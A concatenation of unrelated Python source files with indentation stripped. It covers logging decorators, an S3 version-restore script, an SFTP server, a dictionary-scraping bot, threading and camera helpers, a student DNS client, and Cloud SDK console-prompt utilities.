super().add_fields(log_record, record, message_dict)
def patch_async_emit(handler: Handler):
base_emit = handler.emit
queue = Queue()
def loop():
while True:
record = queue.get()
try:
base_emit(record)
except:
print(sys.exc_info())
def async_emit(record):
queue.put(record)
thread = Thread(target=loop)
thread.daemon = True
thread.start()
handler.emit = async_emit
return handler
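# Illustrative usage (not part of the original module): wrap an existing handler so that
# emit() only enqueues the record while a daemon thread performs the actual I/O.
#
# stream_handler = logging.StreamHandler()
# async_handler = patch_async_emit(stream_handler)
# logging.getLogger().addHandler(async_handler)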
def patch_add_handler(logger):
base_add_handler = logger.addHandler
def async_add_handler(handler):
async_handler = patch_async_emit(handler)
base_add_handler(async_handler)
return async_add_handler
DEFAULT_CONFIG_YAML = """
# logging config
version: 1
disable_existing_loggers: False
handlers:
stream:
class: logging.StreamHandler
level: INFO
formatter: ctf
stream: ext://sys.stdout
stats:
class: logging.FileHandler
level: INFO
formatter: cjf
filename: logs/vyked_stats.log
exceptions:
class: logging.FileHandler
level: INFO
formatter: cjf
filename: logs/vyked_exceptions.log
service:
class: logging.FileHandler
level: INFO
formatter: ctf
filename: logs/vyked_service.log
formatters:
ctf:
(): vyked.utils.log.CustomTimeLoggingFormatter
format: '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
datefmt: '%Y-%m-%d %H:%M:%S,%f'
cjf:
(): vyked.utils.log.CustomJsonFormatter
format: '{ "timestamp":"%(asctime)s", "message":"%(message)s"}'
datefmt: '%Y-%m-%d %H:%M:%S,%f'
root:
handlers: [stream, service]
level: INFO
loggers:
registry:
handlers: [service,]
level: INFO
stats:
handlers: [stats]
level: INFO
exceptions:
handlers: [exceptions]
level: INFO
"""
def setup_logging(_):
try:
with open('config_log.json', 'r') as f:
            config_dict = yaml.safe_load(f.read())
except:
        config_dict = yaml.safe_load(DEFAULT_CONFIG_YAML)
logging.getLogger('asyncio').setLevel(logging.WARNING)
logger = logging.getLogger()
logger.handlers = []
logger.addHandler = patch_add_handler(logger)
global _BRANCH_NAME
(branch_name, current_tag) = get_current_working_repo()
_BRANCH_NAME = branch_name
if 'handlers' in config_dict:
for handler in config_dict['handlers']:
if 'branch_name' in config_dict['handlers'][handler] and config_dict['handlers'][handler]['branch_name'] == True:
config_dict['handlers'][handler]['release'] = current_tag if current_tag else None
if 'tags' in config_dict['handlers'][handler] and isinstance(config_dict['handlers'][handler]['tags'], dict):
config_dict['handlers'][handler]['tags']['branch'] = branch_name if branch_name else None
logging.config.dictConfig(config_dict)
if http_pings_logs_disabled:
for handler in logging.root.handlers:
handler.addFilter(http_ping_filter)
def log(fn=None, logger=logging.getLogger(), debug_level=logging.DEBUG):
"""
logs parameters and result - takes no arguments
"""
if fn is None:
return partial(log, logger=logger, debug_level=debug_level)
@wraps(fn)
def func(*args, **kwargs):
arg_string = ""
for i in range(0, len(args)):
var_name = fn.__code__.co_varnames[i]
if var_name not in ['self', 'cls']:
arg_string += var_name + ":" + str(args[i]) + ","
arg_string = arg_string[0:len(arg_string) - 1]
string = (RED + BOLD + '>> ' + END + 'Calling {0}({1})'.format(fn.__name__, arg_string))
if len(kwargs):
string = (
RED + BOLD + '>> ' + END + 'Calling {0} with args {1} and kwargs {2}'.format(fn.__name__, arg_string,
kwargs))
logger.log(debug_level, string)
wrapped_fn = fn
if not asyncio.iscoroutine(fn):
wrapped_fn = asyncio.coroutine(fn)
try:
result = yield from wrapped_fn(*args, **kwargs)
string = BLUE + BOLD + '<< ' + END + 'Return {0} with result :{1}'.format(fn.__name__, result)
logger.log(debug_level, string)
return result
except Exception as e:
string = (RED + BOLD + '>> ' + END + '{0} raised exception :{1}'.format(fn.__name__, str(e)))
logger.log(debug_level, string)
raise e
return func
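# Illustrative usage (assumption, not from the original module): because the wrapper uses
# `yield from`, the decorated function behaves like an old-style asyncio coroutine and is
# driven from another coroutine rather than called directly.
#
# @log
# def add(a, b):
#     return a + b
#
# # inside another @asyncio.coroutine-style function:
# #     result = yield from add(2, 3)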
def logx(supress_args=[], supress_all_args=False, supress_result=False, logger=logging.getLogger(),
debug_level=logging.DEBUG):
"""
logs parameters and result
takes arguments
supress_args - list of parameter names to supress
supress_all_args - boolean to supress all arguments
supress_result - boolean to supress result
    logger - logger instance used for output; defaults to the root logger
"""
def decorator(fn):
def func(*args, **kwargs):
if not supress_all_args:
arg_string = ""
for i in range(0, len(args)):
var_name = fn.__code__.co_varnames[i]
if var_name != "self" and var_name not in supress_args:
arg_string += var_name + ":" + str(args[i]) + ","
arg_string = arg_string[0:len(arg_string) - 1]
string = (RED + BOLD + '>> ' + END + 'Calling {0}({1})'.format(fn.__name__, arg_string))
if len(kwargs):
string = (
RED + BOLD + '>> ' + END + 'Calling {0} with args {1} and kwargs {2}'.format(
fn.__name__,
arg_string, kwargs))
logger.log(debug_level, string)
wrapped_fn = fn
if not asyncio.iscoroutine(fn):
wrapped_fn = asyncio.coroutine(fn)
result = yield from wrapped_fn(*args, **kwargs)
if not supress_result:
string = BLUE + BOLD + '<< ' + END + 'Return {0} with result : {1}'.format(fn.__name__, result)
logger.log(debug_level, string)
return result
return func
return decorator
|
s3booster-restore-version.py
|
#!/bin/env python3
'''
** Caveat: not suitable for millions of files; fetching the object list becomes slow at that scale
ChangeLogs
- 2021.07.24:
- 2021.07.23: applying multiprocessing.queue + process instead of pool
- 2021.07.21: modified getObject function
- for parallel processing, multiprocessing.Pool used
- used bucket.all instead of paginator
- 2021.07.20: first created
'''
#requirement
## python 3.4+
## boto3
import os
import boto3
import botocore
import multiprocessing
from os import path, makedirs
from datetime import datetime, timezone
from botocore.exceptions import ClientError
#region = 'us-east-2' ## change it with your region
prefix_list = ['data1/']
##Common Variables
region = 'ap-northeast-2' ## change it with your region
bucket_name = 'your-bucket-versioned'
max_process = 512
endpoint='https://s3.'+region+'.amazonaws.com'
debug_en = False
# CMD variables
cmd='restore_obj_version' ## supported_cmd: 'download|del_obj_version|restore_obj_version'
#cmd='del_obj_version' ## supported_cmd: 'download|del_obj_version|restore_obj_version'
#restore_deleted_time = datetime(2019, 10, 22, 20, 0, 0, tzinfo=timezone.utc)
# end of variables ## you don't need to modify below codes.
quit_flag = 'DONE'
if os.name == 'posix':
multiprocessing.set_start_method("fork")
# S3 session
#s3 = boto3.client('s3', region)
s3 = boto3.resource('s3',endpoint_url=endpoint, region_name=region)
bucket = s3.Bucket(bucket_name)
# execute multiprocessing
def run_multip(max_process, exec_func, q):
p_list = []
for i in range(max_process):
p = multiprocessing.Process(target = exec_func, args=(q,))
p_list.append(p)
p.daemon = True
p.start()
return p_list
def finishq(q, p_list):
for j in range(max_process):
q.put(quit_flag)
for pi in p_list:
pi.join()
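# Illustrative sketch of the queue + sentinel worker pattern used in this script (the key
# and version id below are made-up examples): workers started by run_multip() drain the
# queue until they receive quit_flag, which finishq() enqueues before joining them.
#
# q = multiprocessing.Queue()
# p_list = run_multip(4, restore_obj_version, q)
# q.put(('data1/example-object', 'example-version-id'))
# finishq(q, p_list)   # puts quit_flag sentinels on the queue, then joins the workers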
# restore versioned objects
def restore_get_obj_delmarker(sub_prefix, q):
num_obj=0
s3_client = boto3.client('s3')
# using paginator to iterate over 1000 keys
paginator = s3_client.get_paginator('list_object_versions')
pages = paginator.paginate(Bucket=bucket_name, Prefix=sub_prefix)
for page in pages:
if 'DeleteMarkers' in page.keys():
for delmarker_obj in page['DeleteMarkers']:
key = delmarker_obj['Key']
vid = delmarker_obj['VersionId']
mp_data = (key, vid)
#print('restore mp_data:', mp_data)
q.put(mp_data)
num_obj+=1
else:
print('no delmarker')
return num_obj
def restore_obj_version(q):
while True:
mp_data = q.get()
if mp_data == quit_flag:
break
key = mp_data[0] # keyname
vid = mp_data[1] # versionid
try:
obj_version = s3.ObjectVersion(bucket_name, key, vid)
obj_version.delete()
print("[dubug2] object(%s, %s) is restored" %(key, vid))
except Exception as e:
print("[warning] restoring object(%s, %s) is failed" % (key, vid))
print(e)
def restore_obj_version_multi(s3_dirs):
q = multiprocessing.Queue()
total_obj = 0
for s3_dir in s3_dirs:
# multiprocessing tasks
print("[Information] %s directory is restoring" % s3_dir)
p_list = run_multip(max_process, restore_obj_version, q)
# get object list and ingest to processes
num_obj = restore_get_obj_delmarker(s3_dir, q)
# sending quit_flag and join processes
finishq(q, p_list)
print("[Information] %s is restored" % s3_dir)
total_obj += num_obj
return total_obj
def s3_booster_help():
print("example: python3 s3_restore_latest_version.sh")
# start main function
if __name__ == '__main__':
#print("starting script...")
start_time = datetime.now()
s3_dirs = prefix_list
    total_files = 0
    if cmd == 'restore_obj_version':
        total_files = restore_obj_version_multi(s3_dirs)
    else:
        s3_booster_help()
end_time = datetime.now()
print('=============================================')
#for d in down_dir:
# stored_dir = local_dir + d
# print("[Information] Download completed, data stored in %s" % stored_dir)
print('Duration: {}'.format(end_time - start_time))
print('Total File numbers: %d' % total_files)
print('S3 Endpoint: %s' % endpoint)
print("ended")
|
__init__.py
|
import time
import socket
import paramiko
import logging
from src.s3_sftp_si import S3SFTPServerInterface
from src.sftp_si import S3ServerInterface
from src.config import AppConfig
from paramiko.ssh_exception import SSHException
import threading
BACKLOG = 10
def client_connection(server_socket, conn, addr, config):
remote_ip,remote_port = addr
try:
logging.info(f"Connection from {remote_ip}:{remote_port}")
if remote_ip == "10.31.112.24": return
transport = paramiko.Transport(conn)
transport.add_server_key(config.private_key)
transport.set_subsystem_handler(
'sftp', paramiko.SFTPServer, S3SFTPServerInterface, config=config)
server = S3ServerInterface(allowed_keys=config.keys)
transport.start_server(server=server)
channel = transport.accept()
while transport.is_active():
time.sleep(1)
except EOFError as err:
logging.debug(err)
pass
except SSHException as err:
logging.debug(err)
logging.error(f'Error handling connection: {str(err)}')
def start_server(config):
logging.info("Starting server")
logging.debug('Config: ' + str(config.asDict()))
#paramiko_level = getattr(paramiko.common, config.log_level)
#paramiko.common.logging.basicConfig(level=paramiko_level)
transport_log = logging.getLogger('paramiko.transport')
transport_log.setLevel(logging.CRITICAL)
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
server_socket.bind((config.listen_addr, config.listen_port))
server_socket.listen(BACKLOG)
while True:
conn, addr = server_socket.accept()
t = threading.Thread(target=client_connection, args=(server_socket, conn, addr, config,))
t.start()
|
bot.py
|
#!/usr/bin/env python
import sys
import os
import math
import traceback
from multiprocessing import Process
# local modules
import forvo
import api
from models import Term, File, TermWithData
# data sources
# import cambridge
import unsplash
import multitran
import merriamwebster
import howjsay
import macmillan
# here you can temporarily remove sources that you don't need to test
sources = [
# cambridge,
merriamwebster,
unsplash,
multitran,
howjsay,
macmillan,
forvo,
]
reverse_edges = {
'transcription': 'transcription_of',
'definition': 'definition_of',
'collocation': 'collocation_of',
}
words = []
__dir__ = os.path.dirname(os.path.realpath(__file__))
TERMS = {} # key=text@lang, value=uid
__next_id__ = 1
def next_id(prefix):
global __next_id__
id = prefix + str(__next_id__)
__next_id__ += 1
return id
# TODO refactor as generator
def read_words():
with open(os.path.join(__dir__, 'us1000.txt'), 'r', encoding='utf-8') as f:
lines = f.read().split('\n')
lines = [s.strip() for s in lines]
return [s for s in lines if len(s) > 0]
def key_of(text, lang):
    return f'{text}@{lang}'
def define_term(data):
if not isinstance(data, Term):
print("bad term", data)
return None
text = data.text.strip()
# print(f'TERM {text}')
key = key_of(text, data.lang)
if key in TERMS:
return TERMS[key]
id = api.add_term(text, data.lang, data.region)
TERMS[key] = id
return id
def push_data(term_id, data):
for (k, a) in data:
edges = []
for v in a:
is_file = isinstance(v, File)
if is_file:
# TODO optimize adding file with region
file = api.fileproxy(v.url, as_is=True)
related_id = file['uid']
if v.region:
edges.append([related_id, 'region', v.region])
elif isinstance(v, TermWithData):
related_id = define_term(v.term)
if related_id is None:
print("bad term", v.term)
continue
push_data(related_id, v.data)
else:
related_id = define_term(v)
if related_id is None:
print("bad term", v)
continue
edges.append([term_id, k, related_id])
if not is_file:
reverse_edge = reverse_edges[k] if k in reverse_edges else k
edges.append([related_id, reverse_edge, term_id])
if len(edges) > 0:
api.update_graph(edges)
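# Illustrative sketch (assumption, not part of the original script): pushing one related
# term through push_data(); the 'collocation' edge name is taken from reverse_edges above,
# while the words themselves are made-up examples.
#
# term_id = define_term(Term(text='coffee', lang='en', region=None))
# push_data(term_id, [('collocation', [Term(text='strong coffee', lang='en', region=None)])])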
def get_data_safe(source, text, lang):
try:
return source.get_data(text, lang)
except:
print(f'{source.NAME}.get_data({text}, {lang}) fail:')
traceback.print_exc()
return None
def define_word(text, lang='en', source_idx=-1, count=1):
term_id = define_term(Term(text=text, lang=lang, region=None))
source_list = sources if source_idx < 0 else sources[
source_idx:source_idx + count]
for source in source_list:
data = get_data_safe(source, text, lang)
if data is None:
sys.exit(-1)
push_data(term_id, data)
def define_words(source_idx=1, count=1):
api.login("system", os.getenv("SYSTEM_PWD"))
for word in words:
define_word(word, source_idx=source_idx, count=count)
def main():
global words
word = sys.argv[1] if len(sys.argv) >= 2 else None
if word:
words = [word]
else:
words = read_words()
plimit = float(int(os.getenv("PARALLEL", "1")))
if plimit == 1:
for i, src in enumerate(sources):
print(f'FETCH {src.NAME}')
try:
define_words(source_idx=i)
print(f'COMPLETED {src.NAME}')
except:
print(f'FAIL {src.NAME}')
traceback.print_exc()
return
step = math.ceil(len(sources) / plimit)
    processes = []
    for i in range(0, len(sources), step):
        p = Process(target=define_words, args=(i, step))
        p.start()
        processes.append(p)
    # join only after all workers have started so they actually run in parallel
    for p in processes:
        p.join()
if __name__ == '__main__':
main()
|
20-thread.py
|
from queue import Queue
from threading import Thread

q = Queue()

def sync_consume():
while True:
print(q.get())
q.task_done()
def sync_produce():
consumer = Thread(target=sync_consume, daemon=True)
consumer.start()
for i in range(10):
q.put(i)
q.join()
sync_produce()
|
picam_video_input_stream.py
|
from queue import Empty, Queue
from threading import Thread
from picamera import PiCamera
from picamera.array import PiRGBArray
from visutils.video import VideoInputStream
class PicamVideoInputStream(VideoInputStream):
def __init__(self, src: int, is_live=False, buffer_size=128,
resolution=(320, 240), framerate=32, **kwargs):
# initialize the camera
self._camera = PiCamera(src)
# set camera parameters
self._camera.resolution = resolution
self._camera.framerate = framerate
# set optional camera parameters (refer to PiCamera docs)
for (arg, value) in kwargs.items():
setattr(self._camera, arg, value)
# initialize the video
self._rawCapture = PiRGBArray(self._camera, size=resolution)
self._stream = self._camera.capture_continuous(self._rawCapture,
format="bgr",
use_video_port=True)
self._is_live = is_live
self._buffer = Queue(maxsize=buffer_size)
self._thread = Thread(target=self._update, args=())
self._thread.daemon = True
self._frame = None
self._stopped = False
def start(self):
self._thread.start()
def _update(self):
while not self._stopped:
stream = next(self._stream)
frame = stream.array
if self._is_live:
self._clear_buffer()
self._buffer.put(frame)
# grab the frame from the video and clear the video in
# preparation for the next frame
self._rawCapture.seek(0)
self._rawCapture.truncate()
self._stream.close()
self._rawCapture.close()
self._camera.close()
def read(self):
return self._buffer.get()
def _shutdown(self):
self._stopped = True
self._clear_buffer()
self._buffer.put(None)
def _clear_buffer(self):
while not self._buffer.empty():
try:
self._buffer.get_nowait()
except Empty:
pass
def stop(self):
self._shutdown()
self._thread.join()
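# Illustrative usage (assumption, not part of the original module); the camera index,
# live mode and resolution below are example values.
#
# stream = PicamVideoInputStream(0, is_live=True, resolution=(320, 240), framerate=32)
# stream.start()
# frame = stream.read()   # blocks until the capture thread has buffered a frame
# stream.stop()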
|
__main__.py
|
from threading import Thread
from src.gui import GUI_MainThread
from src.simulator import Sim_MainThread
#g_thr = Thread(target=GUI_MainThread)
s_thr = Thread(target=Sim_MainThread)
s_thr.start()
GUI_MainThread()
#g_thr.start()
|
client.py
|
# Anthony Tiongson (ast119) with assistance from Nicolas Gundersen (neg62)
# Client side DNS
#
# resources:
# https://www.pythonforbeginners.com/files/reading-and-writing-files-in-python
# https://www.pythonforbeginners.com/system/python-sys-argv
# https://www.w3schools.com/python/ref_string_split.asp
# https://www.geeksforgeeks.org/args-kwargs-python/
import socket, sys, threading, time
# socketOpen function to open and return a socket in a given port designated by a label.
def socketOpen(label, port):
try:
socketOpen = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketOpenPrompt = "Socket opened to connect to " + label + ": port " + str(port) + "\n"
print(socketOpenPrompt)
return socketOpen
    except socket.error as socketError:
        socketOpenErrorPrompt = label + ' socket already open, error: {} \n'.format(socketError)
        print(socketOpenErrorPrompt)
        exit()
# socketBind function to establish and return a socket binding using a given hostname and port and designated by a label.
def socketBind(label, hostname, port):
# Define the IP address on which you want to connect to the LS server.
IPAddress = socket.gethostbyname(hostname)
print("Hostname on which to connect to " + label + " server: " + hostname + "\n" + "IP address: " + str(IPAddress) + "\n")
socketBind = (IPAddress, port)
return socketBind
# queryFile function connects to a server of a given hostname and port designated by a label and reads a given file input of queries to send to the server. The result of each the query is then written to a given file output.
def queryFile(label, hostname, port, input, output):
# Read a line from an input file list of hostnames, connect to a server, send that hostname to the server, close connection after receiving a response, commit results to an output file.
for line in input:
# Open server socket.
server = socketOpen(label, port)
# Create server socketBind and connect to the server.
server.connect(socketBind(label, hostname, port))
query = line.splitlines()[0].lower()
querySentPrompt = "Sending \"" + query + "\" to " + label + "...\n"
print(querySentPrompt)
server.send(query.encode('utf-8'))
responseFromServer = server.recv(256)
responsePrompt = "Response received from the " + label + ": {}\n".format(responseFromServer.decode('utf-8'))
print(responsePrompt)
# Close connection to server socket.
print("Closing " + label + " socket connection.\n")
server.close()
        output.write(responseFromServer.decode('utf-8') + "\n")
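# Illustrative call (assumption, not part of the original script): the label and file names
# mirror the __main__ block below, while the hostname and port are placeholder values that
# normally come from sys.argv.
#
# with open("PROJ2-HNS.txt", "r") as queries, open("RESOLVED.txt", "a") as out:
#     queryFile("LSServer", "localhost", 8080, queries, out)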
# shutdownServer function sends a shutdown command to a server with a given hostname and port designated by a label.
def shutdownServer(label, hostname, port):
# Tell the server to shut down and close connection.
# Open server socket.
server = socketOpen(label, port)
# Create server socketBind and connect to the server.
server.connect(socketBind(label, hostname, port))
# Send shutdown command.
print("Shutting down " + label + "...\n")
shutdownCommand = "shutdown" + label
server.send(shutdownCommand.encode('utf-8'))
# Close connection to server socket.
print("Closing " + label + " socket connection.\n")
server.close()
# shutdown function closes given files and shuts down the client.
def shutdown(*files):
print("Closing files...")
for file in files:
file.close()
print("Shutting down client.")
exit()
# client function takes in a given server's label, an input file object with a list of hostnames to query, and an output file object to write results.
def client(serverLabel, hostnameQueryFile, results):
# Establish server hostname.
hostname = str(sys.argv[1])
# Establish server port via command-line argument.
port = int(sys.argv[2])
# Read all hostnames in hostnameQueryFile to query the server and write responses in the file results.
queryFile(serverLabel, hostname, port, hostnameQueryFile, results)
# Send shutdown command to server once file is completely queried.
shutdownServer(serverLabel, hostname, port)
# Close all files and shutdown client.
shutdown(hostnameQueryFile, results)
if __name__ == "__main__":
# Set label for server client will connect to
serverLabel = "LSServer"
# Create file object to read list of hostnames to query.
hostnameQueryFile = open("PROJ2-HNS.txt", "r")
# Create file object to write all outputs.
results = open("RESOLVED.txt", "a")
thread = threading.Thread(name='client', target = client, args = (serverLabel, hostnameQueryFile, results,))
thread.start()
sleepTime = 5
executionPrompt = "\nClient thread executed, sleep time: " + str(sleepTime) + " sec\n"
print(executionPrompt)
time.sleep(sleepTime)
|
console_io.py
|
# Copyright 2013 Google Inc. All Rights Reserved.
"""General console printing utilities used by the Cloud SDK."""
import logging
import string
import sys
import textwrap
import threading
import time
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
class Error(exceptions.Error):
"""Base exception for the module."""
pass
class UnattendedPromptError(Error):
"""An exception for when a prompt cannot be answered."""
def __init__(self):
super(UnattendedPromptError, self).__init__(
'This prompt could not be answered because you are not in an '
'interactive session. You can re-run the command with the --quiet '
'flag to accept default answers for all prompts.')
class TablePrinter(object):
"""Provides the ability to print a list of items as a formatted table.
Using this class helps you adhere to the gcloud style guide.
The table will auto size the columns to fit the maximum item length for that
column. You can also choose how to justify each column and to add extra
padding to each column.
"""
JUSTIFY_LEFT = '<'
JUSTIFY_RIGHT = '>'
JUSTIFY_CENTER = '^'
def __init__(self, headers, title=None,
justification=None, column_padding=None):
"""Creates a new TablePrinter.
Args:
headers: A tuple of strings that represent the column headers titles.
This can be a tuple of empty strings or None's if you do not want
headers displayed. The number of empty elements in the tuple must match
the number of columns you want to display.
title: str, An optional title for the table.
justification: A tuple of JUSTIFY_LEFT, JUSTIFY_RIGHT, JUSTIFY_CENTER that
describes the justification for each column. This must have the same
number of items as the headers tuple.
column_padding: A tuple of ints that describes the extra padding that
should be added to each column. This must have the same
number of items as the headers tuple.
Raises:
ValueError: If the justification or column_padding tuples are not of the
correct type or length.
"""
self.__headers = [h if h else '' for h in headers]
self.__title = title
self.__num_columns = len(self.__headers)
self.__header_widths = [len(str(x)) for x in self.__headers]
self.__column_padding = column_padding
if self.__column_padding is None:
self.__column_padding = tuple([0] * self.__num_columns)
if (not isinstance(self.__column_padding, (tuple)) or
len(self.__column_padding) != self.__num_columns):
raise ValueError('Column padding tuple does not have {0} columns'
.format(self.__num_columns))
self.__justification = justification
if self.__justification is None:
self.__justification = tuple([TablePrinter.JUSTIFY_LEFT] *
self.__num_columns)
if (not isinstance(self.__justification, tuple) or
len(self.__justification) != self.__num_columns):
raise ValueError('Justification tuple does not have {0} columns'
.format(self.__num_columns))
for value in self.__justification:
if not (value is TablePrinter.JUSTIFY_LEFT or
value is TablePrinter.JUSTIFY_RIGHT or
value is TablePrinter.JUSTIFY_CENTER):
raise ValueError('Justification values must be one of JUSTIFY_LEFT, '
'JUSTIFY_RIGHT, or JUSTIFY_CENTER')
def SetTitle(self, title):
"""Sets the title of the table.
Args:
title: str, The new title.
"""
self.__title = title
def Log(self, rows, logger=None, level=logging.INFO):
"""Logs the given rows to the given logger.
Args:
rows: list of tuples, The rows to log the formatted table for.
logger: logging.Logger, The logger to do the logging. If None, the root
logger will be used.
level: logging level, An optional override for the logging level, INFO by
default.
"""
if not logger:
logger = log.getLogger()
lines = self.GetLines(rows)
for line in lines:
logger.log(level, line)
def Print(self, rows, output_stream=None, indent=0):
"""Prints the given rows to stdout.
Args:
rows: list of tuples, The rows to print the formatted table for.
      output_stream: file-like object, The stream to write the rows to. Defaults
to log.out if not given.
indent: int, The number of spaces to indent all lines of the table.
"""
if not output_stream:
output_stream = log.out
lines = self.GetLines(rows, indent=indent)
for line in lines:
output_stream.write(line + '\n')
def GetLines(self, rows, indent=0):
"""Gets a list of strings of formatted lines for the given rows.
Args:
rows: list of tuples, The rows to get the formatted table for.
indent: int, The number of spaces to indent all lines of the table.
Returns:
list of str, The lines of the formatted table that can be printed.
Raises:
ValueError: If any row does not have the correct number of columns.
"""
column_widths = list(self.__header_widths)
for row in rows:
if len(row) != self.__num_columns:
raise ValueError('Row [{row}] does not have {rows} columns'
.format(row=row, rows=self.__num_columns))
# Find the max width of each column
for i in range(self.__num_columns):
column_widths[i] = max(column_widths[i], len(str(row[i])))
# Add padding
column_widths = [column_widths[i] + self.__column_padding[i]
for i in range(self.__num_columns)]
total_width = (len(column_widths) - 1) * 3
for width in column_widths:
total_width += width
edge_line = ('--' +
'---'.join(['-' * width for width in column_widths]) +
'--')
title_divider_line = ('|-' +
'---'.join(['-' * width for width in column_widths]) +
'-|')
divider_line = ('|-' +
'-+-'.join(['-' * width for width in column_widths]) +
'-|')
lines = [edge_line]
if self.__title:
title_line = '| {{title:{justify}{width}s}} |'.format(
justify=TablePrinter.JUSTIFY_CENTER, width=total_width).format(
title=self.__title)
lines.append(title_line)
lines.append(title_divider_line)
# Generate format strings with the correct width for each column
column_formats = []
for i in range(self.__num_columns):
column_formats.append('{{i{i}:{justify}{width}s}}'.format(
i=i, justify=self.__justification[i], width=column_widths[i]))
pattern = '| ' + ' | '.join(column_formats) + ' |'
def _ParameterizedArrayDict(array):
return dict(('i{i}'.format(i=i), array[i]) for i in range(len(array)))
if [h for h in self.__headers if h]:
# Only print headers if there is at least one non-empty header
lines.append(pattern.format(**_ParameterizedArrayDict(self.__headers)))
lines.append(divider_line)
lines.extend([pattern.format(**_ParameterizedArrayDict(row))
for row in rows])
lines.append(edge_line)
if indent:
return [(' ' * indent) + l for l in lines]
return lines
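# Illustrative usage (not part of the original module); the headers and rows below are
# made-up example values.
#
#   printer = TablePrinter(('NAME', 'ZONE'), title='Instances',
#                          justification=(TablePrinter.JUSTIFY_LEFT,
#                                         TablePrinter.JUSTIFY_LEFT))
#   printer.Print([('vm-1', 'us-central1-a'), ('vm-2', 'europe-west1-b')])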
class ListPrinter(object):
"""Provides the ability to print a list of items as a formatted list.
Using this class helps you adhere to the gcloud style guide.
"""
def __init__(self, title):
"""Create a titled list printer that can print rows to stdout.
Args:
title: A string for the title of the list.
"""
self.__title = title
def Print(self, rows, output_stream=None):
"""Print this list with the provided rows to stdout.
Args:
rows: A list of objects representing the rows of this list. Before being
printed, they will be converted to strings.
      output_stream: file-like object, The stream to write the rows to. Defaults
to log.out if not given.
"""
if not output_stream:
output_stream = log.out
output_stream.write(self.__title + '\n')
for row in rows:
output_stream.write(' - ' + str(row) + '\n')
TEXTWRAP = textwrap.TextWrapper(replace_whitespace=False,
drop_whitespace=False,
break_on_hyphens=False)
def _DoWrap(message):
"""Text wrap the given message and correctly handle newlines in the middle.
Args:
message: str, The message to wrap. It may have newlines in the middle of
it.
Returns:
str, The wrapped message.
"""
return '\n'.join([TEXTWRAP.fill(line) for line in message.splitlines()])
def _RawInput(prompt=None):
"""A simple redirect to the built-in raw_input function.
If the prompt is given, it is correctly line wrapped.
Args:
prompt: str, An optional prompt.
Returns:
The input from stdin.
"""
if prompt:
sys.stderr.write(_DoWrap(prompt))
try:
return raw_input()
except EOFError:
return None
def IsInteractive():
"""Determines if the current terminal session is interactive."""
return sys.stdin.isatty()
def PromptContinue(message=None, prompt_string=None, default=True,
throw_if_unattended=False):
"""Prompts the user a yes or no question and asks if they want to continue.
Args:
message: str, The prompt to print before the question.
prompt_string: str, An alternate yes/no prompt to display. If None, it
defaults to 'Do you want to continue'.
default: bool, What the default answer should be. True for yes, False for
no.
throw_if_unattended: bool, If True, this will throw if there was nothing
to consume on stdin and stdin is not a tty.
Raises:
UnattendedPromptError: If there is no input to consume and this is not
running in an interactive terminal.
Returns:
bool, False if the user said no, True if the user said anything else or if
prompts are disabled.
"""
if properties.VALUES.core.disable_prompts.GetBool():
return default
if not prompt_string:
prompt_string = 'Do you want to continue'
if message:
sys.stderr.write(_DoWrap(message) + '\n\n')
if default:
prompt_string += ' (Y/n)? '
else:
prompt_string += ' (y/N)? '
sys.stderr.write(_DoWrap(prompt_string))
while True:
answer = _RawInput()
# pylint:disable=g-explicit-bool-comparison, We explicitly want to
# distinguish between empty string and None.
if answer == '':
# User just hit enter, return default.
sys.stderr.write('\n')
return default
elif answer is None:
# This means we hit EOF, no input or user closed the stream.
if throw_if_unattended and not IsInteractive():
sys.stderr.write('\n')
raise UnattendedPromptError()
else:
sys.stderr.write('\n')
return default
elif answer.lower() in ['y', 'yes']:
sys.stderr.write('\n')
return True
elif answer.lower() in ['n', 'no']:
sys.stderr.write('\n')
return False
else:
sys.stderr.write("Please enter 'y' or 'n': ")
def PromptResponse(message):
"""Prompts the user for a string.
Args:
message: str, The prompt to print before the question.
Returns:
str, The string entered by the user, or None if prompts are disabled.
"""
if properties.VALUES.core.disable_prompts.GetBool():
return None
response = _RawInput(message)
return response
def PromptChoice(options, default=None, message=None, prompt_string=None):
"""Prompt the user to select a choice from a list of items.
Args:
options: [object], A list of objects to print as choices. Their str()
method will be used to display them.
default: int, The default index to return if prompting is disabled or if
they do not enter a choice.
message: str, An optional message to print before the choices are displayed.
prompt_string: str, A string to print when prompting the user to enter a
choice. If not given, a default prompt is used.
Raises:
ValueError: If no options are given or if the default is not in the range of
available options.
Returns:
The index of the item in the list that was chosen, or the default if prompts
are disabled.
"""
if not options:
raise ValueError('You must provide at least one option.')
maximum = len(options)
if default is not None and not 0 <= default < maximum:
raise ValueError(
'Default option [{default}] is not a valid index for the options list '
'[{maximum} options given]'.format(default=default, maximum=maximum))
if properties.VALUES.core.disable_prompts.GetBool():
return default
if message:
sys.stderr.write(_DoWrap(message) + '\n')
for i, option in enumerate(options):
sys.stderr.write(' [{index}] {option}\n'.format(
index=i + 1, option=str(option)))
if not prompt_string:
prompt_string = 'Please enter your numeric choice'
if default is None:
suffix_string = ': '
else:
suffix_string = ' ({default}): '.format(default=default + 1)
sys.stderr.write(_DoWrap(prompt_string + suffix_string))
while True:
answer = _RawInput()
    if answer is None or (answer == '' and default is not None):
# Return default if we failed to read from stdin
# Return default if the user hit enter and there is a valid default
# Prompt again otherwise
sys.stderr.write('\n')
return default
try:
num_choice = int(answer)
if num_choice < 1 or num_choice > maximum:
raise ValueError('Choice must be between 1 and {maximum}'.format(
maximum=maximum))
sys.stderr.write('\n')
return num_choice - 1
except ValueError:
sys.stderr.write('Please enter a value between 1 and {maximum}: '
.format(maximum=maximum))
def LazyFormat(s, *args, **kwargs):
"""Format a string, allowing unresolved parameters to remain unresolved.
Args:
s: str, The string to format.
*args: [str], A list of strings for numerical parameters.
**kwargs: {str:str}, A dict of strings for named parameters.
Returns:
str, The lazily-formatted string.
"""
class SafeDict(dict):
def __missing__(self, key):
return '{' + key + '}'
return string.Formatter().vformat(s, args, SafeDict(kwargs))
def PrintExtendedList(items, col_fetchers):
"""Print a properly formated extended list for some set of resources.
If items is a generator, this function may elect to only request those rows
that it is ready to display.
Args:
items: [resource] or a generator producing resources, The objects
representing cloud resources.
col_fetchers: [(string, func(resource))], A list of tuples, one for each
column, in the order that they should appear. The string is the title
of that column which will be printed in a header. The func is a function
